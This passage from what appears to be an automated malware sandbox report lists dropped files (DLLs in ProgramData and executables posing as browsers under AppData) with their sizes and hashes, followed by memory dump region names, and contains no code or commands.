09fc0b2194e8b8b5d690650057805b8966305f3e

SHA256
0af01618c8b68b42870b2fa8b0ee79ce961a3199cd8c006c7d1e770abb93030c

SHA512
fadcacb167576455ee3a1ac8e45d34c5d8aeb428490eb14572ecb8580622f5b4d82d46a9823ec0b6e7e0a4637749f8ffc35525ac7068f2236f358c353a447c99

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\ProgramData\sqlite3.dll

Filesize
1.1MB

MD5
1f44d4d3087c2b202cf9c90ee9d04b0f

SHA1
106a3ebc9e39ab6ddb3ff987efb6527c956f192d

SHA256
4841020c8bd06b08fde6e44cbe2e2ab33439e1c8368e936ec5b00dc0584f7260

SHA512
b614c72a3c1ce681ebffa628e29aa50275cc80ca9267380960c5198ea4d0a3f2df6cfb7275491d220bad72f14fc94e6656501e9a061d102fb11e00cfda2beb45

Download Submit
\Users\Admin\AppData\Local\Microsoft\brave.exe

Filesize
3.2MB

MD5
872358b05cc08ca705a1a7592c23ecdf

SHA1
388dd6811a9459a2dbc78bdf38ef0477ca5b0704

SHA256
054174b77c43d2b1a97a1238282818dc2792535ec0e3b94102c58d9d9ffeba15

SHA512
bd12b7d87a172b1efeb1cf2bcf47d1594bb953dc6ac8bdce650f5d58ce818e74e5f90d82c7e4cfa9b39126cc6bc1323c1ba2f8f02b6be13f385ae524f0ac6e2a

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\chrome.exe

Filesize
725KB

MD5
3b21c52f7bf1f84b356020af8c9b3c45

SHA1
38f56daaa3dc98c233c1abcce1a5a864a49da66b

SHA256
a6ccbe999228a8ef36443b321573865ddf4dac81e20a586d694d8a2ff4837279

SHA512
445c058ec4f7f50f7774533c82be74c42470377fa00ba26796405069f6a70979a246d6f741ec09813b5a4d3b60420295bea7e0583a09b25296ddeb5ca2b274f0

Download Submit
\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
\Users\Admin\AppData\Local\Microsoft\ofg.exe

Filesize
7KB

MD5
b491f711272344f719ee13d98ff337bf

SHA1
f6f621d78adba380fd5da1e5b20e51b10e072d5f

SHA256
453755b23c6df8cb1b2955135fe5aa8295eb0ce984f946967847b59cd87239e2

SHA512
fe2be4e97f5d20d155bf30c2a5399923c20509fc096dd5abc38d32a08db627f0fdc78bde6699f0c01e50d3aa56b83c88f0b565c68b50e014e91ba4f92e30cc1f

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
\Users\Admin\AppData\Local\Microsoft\test.exe

Filesize
1.3MB

MD5
0688e13f50cad69b7857ff50be40b6f9

SHA1
237e7880a8c65c15aca803ead6c8b98bb3f84ef1

SHA256
afeafca67e182853fa5be8431fa8df6b0e84fbf5aee18b692b7c5c068ec02ecf

SHA512
a0ab90a8ec080c4740642c49a939544ce1a2895096a073ba3decf0fbd7181b57a3e1578466ca94a2b6df5c3acdd4e8c8a0e62c5c8b2c55f8f95d4f570aa6d19a

Download Submit
memory/292-285-0x0000000000EC0000-0x0000000000EEA000-memory.dmp

Filesize
168KB

Download
memory/292-288-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/308-291-0x0000000001C80000-0x0000000001CAA000-memory.dmp

Filesize
168KB

Download
memory/308-294-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/420-241-0x00000000008C0000-0x00000000008E3000-memory.dmp

Filesize
140KB

Download
memory/420-214-0x00000000008C0000-0x00000000008E3000-memory.dmp

Filesize
140KB

Download
memory/420-216-0x000007FEBEB50000-0x000007FEBEB60000-memory.dmp

Filesize
64KB

Download
memory/420-217-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/420-248-0x0000000000980000-0x00000000009AA000-memory.dmp

Filesize
168KB

Download
memory/464-251-0x0000000000220000-0x000000000024A000-memory.dmp

Filesize
168KB

Download
memory/464-222-0x000007FEBEB50000-0x000007FEBEB60000-memory.dmp

Filesize
64KB

Download
memory/464-223-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/480-226-0x000007FEBEB50000-0x000007FEBEB60000-memory.dmp

Filesize
64KB

Download
memory/480-228-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/480-255-0x0000000000140000-0x000000000016A000-memory.dmp

Filesize
168KB

Download
memory/488-261-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/488-258-0x0000000000480000-0x00000000004AA000-memory.dmp

Filesize
168KB

Download
memory/588-264-0x0000000000410000-0x000000000043A000-memory.dmp

Filesize
168KB

Download
memory/588-267-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/668-270-0x00000000003C0000-0x00000000003EA000-memory.dmp

Filesize
168KB

Download
memory/748-273-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/768-70-0x0000000000E20000-0x0000000000E28000-memory.dmp

Filesize
32KB

Download
memory/804-276-0x00000000007D0000-0x00000000007FA000-memory.dmp

Filesize
168KB

Download
memory/804-340-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/844-342-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/844-279-0x0000000000930000-0x000000000095A000-memory.dmp

Filesize
168KB

Download
memory/868-282-0x0000000000860000-0x000000000088A000-memory.dmp

Filesize
168KB

Download
memory/868-344-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/968-54-0x0000000000090000-0x00000000000B8000-memory.dmp

Filesize
160KB

Download
memory/968-95-0x0000000006F80000-0x00000000070A6000-memory.dmp

Filesize
1.1MB

Download
memory/968-85-0x0000000009D50000-0x000000000A211000-memory.dmp

Filesize
4.8MB

Download
memory/968-63-0x0000000000090000-0x00000000000B8000-memory.dmp

Filesize
160KB

Download
memory/968-62-0x0000000000090000-0x00000000000B8000-memory.dmp

Filesize
160KB

Download
memory/968-56-0x0000000000090000-0x00000000000B8000-memory.dmp

Filesize
160KB

Download
memory/968-82-0x0000000009CE0000-0x0000000009F1C000-memory.dmp

Filesize
2.2MB

Download
memory/968-81-0x0000000009CE0000-0x0000000009F1C000-memory.dmp

Filesize
2.2MB

Download
memory/968-64-0x0000000075BD1000-0x0000000075BD3000-memory.dmp

Filesize
8KB

Download
memory/1056-297-0x0000000000390000-0x00000000003BA000-memory.dmp

Filesize
168KB

Download
memory/1056-345-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/1132-300-0x0000000001C80000-0x0000000001CAA000-memory.dmp

Filesize
168KB

Download
memory/1224-303-0x0000000001C80000-0x0000000001CAA000-memory.dmp

Filesize
168KB

Download
memory/1236-348-0x00000000001D0000-0x00000000001FA000-memory.dmp

Filesize
168KB

Download
memory/1260-306-0x0000000002A90000-0x0000000002ABA000-memory.dmp

Filesize
168KB

Download
memory/1260-346-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/2016-84-0x00000000002B0000-0x0000000000310000-memory.dmp

Filesize
384KB

Download
memory/2016-83-0x0000000000400000-0x000000000063C000-memory.dmp

Filesize
2.2MB

Download
memory/2016-110-0x00000000002B0000-0x0000000000310000-memory.dmp

Filesize
384KB

Download
memory/2016-109-0x0000000000400000-0x000000000063C000-memory.dmp

Filesize
2.2MB

Download
memory/2028-347-0x00000000373C0000-0x00000000373D0000-memory.dmp

Filesize
64KB

Download
memory/2028-309-0x0000000000360000-0x000000000038A000-memory.dmp

Filesize
168KB

Download
memory/9280-171-0x000000013FAF0000-0x000000013FFB1000-memory.dmp

Filesize
4.8MB

Download
memory/9280-87-0x000000013FAF0000-0x000000013FFB1000-memory.dmp

Filesize
4.8MB

Download
memory/9280-111-0x000000013FAF0000-0x000000013FFB1000-memory.dmp

Filesize
4.8MB

Download
memory/32608-96-0x0000000000400000-0x0000000000526000-memory.dmp

Filesize
1.1MB

Download
memory/60748-107-0x000007FEFBC01000-0x000007FEFBC03000-memory.dmp

Filesize
8KB

Download
memory/60748-108-0x000007FEF4260000-0x000007FEF4C83000-memory.dmp

Filesize
10.1MB

Download
memory/60748-127-0x000007FEF3700000-0x000007FEF425D000-memory.dmp

Filesize
11.4MB

Download
memory/60748-135-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/60748-137-0x000000001B720000-0x000000001BA1F000-memory.dmp

Filesize
3.0MB

Download
memory/60748-139-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/60748-140-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/60920-156-0x000000001B7E0000-0x000000001BADF000-memory.dmp

Filesize
3.0MB

Download
memory/60920-165-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/60920-164-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/60920-150-0x000007FEF38C0000-0x000007FEF42E3000-memory.dmp

Filesize
10.1MB

Download
memory/60920-153-0x000007FEF2D60000-0x000007FEF38BD000-memory.dmp

Filesize
11.4MB

Download
memory/60920-166-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/60952-123-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/60952-126-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/60952-116-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/60952-112-0x0000000000400000-0x000000000045E000-memory.dmp

Filesize
376KB

Download
memory/60968-138-0x0000000001380000-0x0000000001388000-memory.dmp

Filesize
32KB

Download
memory/61556-176-0x0000000002334000-0x0000000002337000-memory.dmp

Filesize
12KB

Download
memory/61556-174-0x000007FEF4260000-0x000007FEF4C83000-memory.dmp

Filesize
10.1MB

Download
memory/61556-175-0x000007FEF3700000-0x000007FEF425D000-memory.dmp

Filesize
11.4MB

Download
memory/61556-178-0x0000000002334000-0x0000000002337000-memory.dmp

Filesize
12KB

Download
memory/61556-179-0x000000000233B000-0x000000000235A000-memory.dmp

Filesize
124KB

Download
memory/61700-192-0x000000013FBB0000-0x0000000140071000-memory.dmp

Filesize
4.8MB

Download
memory/61772-193-0x000000013FBB0000-0x0000000140071000-memory.dmp

Filesize
4.8MB

Download
memory/61796-202-0x0000000073050000-0x00000000735FB000-memory.dmp

Filesize
5.7MB

Download
memory/61828-194-0x0000000000F44000-0x0000000000F47000-memory.dmp

Filesize
12KB

Download
memory/61828-206-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/61828-198-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/61828-213-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/61828-212-0x0000000077260000-0x000000007737F000-memory.dmp

Filesize
1.1MB

Download
memory/61828-211-0x0000000000F4B000-0x0000000000F6A000-memory.dmp

Filesize
124KB

Download
memory/61828-191-0x000007FEF2D60000-0x000007FEF38BD000-memory.dmp

Filesize
11.4MB

Download
memory/61828-189-0x000007FEF38C0000-0x000007FEF42E3000-memory.dmp

Filesize
10.1MB

Download
memory/61828-204-0x0000000000F4B000-0x0000000000F6A000-memory.dmp

Filesize
124KB

Download
memory/61828-209-0x0000000000F44000-0x0000000000F47000-memory.dmp

Filesize
12KB

Download
memory/61828-199-0x0000000077260000-0x000000007737F000-memory.dmp

Filesize
1.1MB

Download
memory/61828-208-0x0000000077260000-0x000000007737F000-memory.dmp

Filesize
1.1MB

Download
memory/61968-207-0x0000000077380000-0x0000000077529000-memory.dmp

Filesize
1.7MB

Download
memory/61968-210-0x0000000077260000-0x000000007737F000-memory.dmp

Filesize
1.1MB

Download
memory/61968-244-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/61968-205-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/61968-200-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download